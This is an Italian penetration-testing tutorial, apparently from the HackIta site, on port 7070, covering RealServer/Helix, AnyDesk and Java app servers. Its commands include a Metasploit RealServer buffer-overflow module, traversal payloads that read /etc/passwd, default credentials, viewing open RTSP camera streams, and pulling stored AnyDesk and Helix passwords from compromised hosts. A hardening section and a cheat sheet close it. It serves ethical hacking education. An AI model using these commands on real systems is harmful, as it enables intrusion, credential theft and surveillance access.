networking

Porta 7070 Pentest: RealServer, Helix e AnyDesk

Porta 7070 Pentest: RealServer, Helix e AnyDesk

Port 7070 aperta? Guida pentest 2026: cos'è, enumerazione Helix/RealServer, exploit RTSP, directory traversal, AnyDesk e Java app server.

  • Pubblicato il 2026-04-16
  • Tempo di lettura: 4 min

La porta 7070 TCP è storicamente associata a RealServer (poi rinominato Helix Universal Server), la piattaforma di streaming media di RealNetworks che ha dominato gli anni 2000 — quella dei file .rm e .ram che facevano buffering eterno sulla connessione 56k. Se sei abbastanza giovane da non ricordarlo, immagina un antenato di YouTube che richiedeva un player dedicato e un server specifico per distribuire audio e video. Nel 2026 RealServer è praticamente estinto, ma la porta 7070 non lo è: oggi viene comunemente riutilizzata da AnyDesk (remote desktop), Kubernetes Dashboard (in alcune configurazioni), web application server di sviluppo (Jetty, WildFly in porta alternativa) e vari servizi interni. Trovare la 7070 aperta durante un pentest richiede prima di tutto capire cosa ci gira effettivamente sopra — e poi agire di conseguenza.

Questo articolo copre sia lo scenario legacy (RealServer/Helix — ancora presente in infrastrutture media, broadcast e IPTV) sia le alternative moderne, perché nel pentest reale la porta che trovi aperta non è sempre quella che ti aspetti.

1. Identificare il Servizio #

La prima cosa da fare con la porta 7070 è capire cosa sta rispondendo. Non dare per scontato che sia RealServer.

Nmap #

bash
nmap -sV -p 7070 10.10.10.40
text
PORT     STATE SERVICE       VERSION
7070/tcp open  realserver?
# oppure
7070/tcp open  http          Jetty 9.4.44
# oppure
7070/tcp open  ssl/http      AnyDesk
bash
curl -s http://10.10.10.40:7070/ -I
RispostaServizio probabile
Server: Helix o RealServerRealServer / Helix
Server: Jetty, WildFly, TomcatJava app server
No header standard, connessione binariaAnyDesk o protocollo proprietario
Dashboard HTML con “Kubernetes”K8s Dashboard (tratta come porta 6443)
JSON APIServizio custom — enumera endpoint
bash
# Prova anche RTSP (il protocollo nativo di RealServer)
nc -nv 10.10.10.40 7070
# Invia una richiesta RTSP
# OPTIONS rtsp://10.10.10.40:7070/ RTSP/1.0
# CSeq: 1

Se risponde con RTSP/1.0 200 OK → è davvero un server di streaming.

2. Scenario Legacy: RealServer / Helix Universal Server #

Cos’è RealServer #

RealNetworks ha sviluppato RealServer (poi Helix) per lo streaming di contenuti multimediali: radio online, TV in diretta, video on demand. Usava il protocollo proprietario RTSP (Real Time Streaming Protocol) e i formati RealMedia (.rm, .rv, .ra). Ha avuto il suo picco tra il 1998 e il 2008, quando Flash e poi HTML5 lo hanno reso obsoleto.

Oggi Helix Server sopravvive in nicchie specifiche: emittenti radio/TV che non hanno mai migrato, sistemi IPTV in hotel e ospedali, reti di sorveglianza legacy e ambienti broadcast professionali.

Enumerazione #

bash
# Versione dal banner HTTP
curl -s http://10.10.10.40:7070/ -I
text
HTTP/1.0 200 OK
Server: Helix Server Version 15.0.0.0 (linux-2.6-i386)
bash
# Admin console (porta separata, spesso 7071)
curl -s http://10.10.10.40:7071/admin/

Default credentials Helix #

UsernamePasswordInterfaccia
adminadminAdmin console
admin(vuota)Alcune versioni

CVE di RealServer/Helix #

bash
searchsploit realserver
searchsploit helix server
searchsploit helix universal
text
Helix Server - Remote Code Execution
RealServer 7-9 - Describe Buffer Overflow (SEH)
Helix Server 14.x - RTSP DESCRIBE Buffer Overflow
RealServer 8 - Remote Root Exploit

Le CVE principali riguardano:

Buffer overflow RTSP DESCRIBE — una richiesta RTSP con URL molto lungo causa overflow:

bash
# Metasploit
use exploit/multi/realserver/describe
set RHOSTS 10.10.10.40
set RPORT 7070
run

Directory traversal — accesso a file fuori dalla directory dei contenuti:

bash
curl -s "http://10.10.10.40:7070/..%5c..%5c..%5c..%5c/etc/passwd"
curl -s "http://10.10.10.40:7070/..%252f..%252f..%252f..%252fetc/passwd"

Information disclosure — la pagina di stato espone configurazione e path:

bash
curl -s http://10.10.10.40:7070/viewsource/template.html

RTSP exploitation #

bash
# Enumera stream disponibili
nmap -p 7070 --script=rtsp-methods,rtsp-url-brute 10.10.10.40
bash
# Connettiti a uno stream
vlc rtsp://10.10.10.40:7070/live/stream1
# Oppure
ffplay rtsp://10.10.10.40:7070/live/stream1

Se lo stream non richiede autenticazione → accesso diretto ai contenuti video/audio. In contesti di sorveglianza, questo significa vedere le telecamere.

3. Scenario Moderno: AnyDesk sulla 7070 #

AnyDesk è un software di remote desktop che usa la porta 7070 TCP per le connessioni. Se Nmap identifica AnyDesk:

bash
# AnyDesk esposto senza password
# Tenta la connessione con il client AnyDesk
anydesk 10.10.10.40

Se AnyDesk è configurato con password fissa (unattended access) anziché richiedere approvazione interattiva:

bash
# Brute force non è pratico (rate limiting pesante)
# Cerca la password in file di configurazione su macchine già compromesse
find / -path "*/AnyDesk/*" -name "*.conf" 2>/dev/null
cat /root/.anydesk/system.conf | grep password

La password di AnyDesk salvata nel registro Windows:

powershell
reg query "HKLM\SOFTWARE\WOW6432Node\AnyDesk" /s

4. Scenario Moderno: Java App Server sulla 7070 #

Se un Jetty, WildFly o altro Java server ascolta sulla 7070:

bash
# Identifica il framework
curl -s http://10.10.10.40:7070/ -I | grep -i server

# Directory bruteforce
gobuster dir -u http://10.10.10.40:7070 -w /usr/share/wordlists/dirb/common.txt

# Cerca console di management
curl -s http://10.10.10.40:7070/jolokia/
curl -s http://10.10.10.40:7070/actuator/
curl -s http://10.10.10.40:7070/manager/

Se trovi Jolokia (JMX over HTTP) → possibile RCE via MBean. Se trovi Spring Actuator → information disclosure e potenziale RCE. Se trovi una console di management → credenziali default del framework specifico.

5. Post-Exploitation #

Da RealServer shell #

Se ottieni una shell da un exploit RealServer, gira tipicamente come utente real o helix:

bash
id
# uid=500(real) gid=500(real) groups=500(real)

# Configurazione con credenziali
find / -name "*.cfg" -path "*/helix/*" -exec grep -liE "password|AdminPassword" {} \;
cat /opt/helix/Server/rmserver.cfg | grep -i password

La configurazione di Helix contiene password per l’admin console e a volte credenziali per backend storage e CDN.

Per l’escalation: Linux Privilege Escalation.

Da app server Java #

Variabili d’ambiente, file di configurazione e datasource JDBC — stessi pattern di WebLogic e Tomcat.

6. Detection & Hardening #

  • Se RealServer è legacy, migra — Helix non riceve più aggiornamenti di sicurezza
  • Se devi mantenerlo: isola in una VLAN dedicata, firewall la 7070 solo per i client legittimi
  • Autenticazione sugli stream — non lasciare stream RTSP aperti
  • Admin console su porta separata, non esposta, con credenziali forti
  • AnyDesk: password complessa per unattended access, whitelist IP, disabilita se non necessario
  • App server Java: stesse best practice di qualsiasi web application — patch, auth, WAF, no console esposta
  • Monitora connessioni sulla 7070 da IP inattesi

7. Cheat Sheet Finale #

AzioneComando
Nmapnmap -sV -p 7070 target
Bannercurl -s http://target:7070/ -I
RTSP testnmap -p 7070 --script=rtsp-methods target
Stream accessvlc rtsp://target:7070/live/stream1
Helix admincurl -s http://target:7071/admin/
Dir traversalcurl -s "http://target:7070/..%5c..%5c/etc/passwd"
Searchsploitsearchsploit realserver helix
MSF exploituse exploit/multi/realserver/describe
Jolokiacurl -s http://target:7070/jolokia/
Actuatorcurl -s http://target:7070/actuator/
Gobustergobuster dir -u http://target:7070 -w wordlist

Riferimento: RealNetworks Helix documentation, RTSP Protocol RFC 2326, HackTricks media servers. Uso esclusivo in ambienti autorizzati.

Credi nel progetto HackIta? Aiutaci a restare il riferimento dell’hacking etico italiano con una donazione. Per aziende che vogliono testare la propria sicurezza: penetration test professionale.

#rtsp-exploit #helix-server

DIVENTA PARTE DELL’ÉLITE DELL’HACKING ETICO.

Accedi a risorse avanzate, lab esclusivi e strategie usate dai veri professionisti della cybersecurity.

Non sono un robot

Iscrivendoti accetti di ricevere la newsletter di HACKITA. Ti puoi disiscrivere in qualsiasi momento.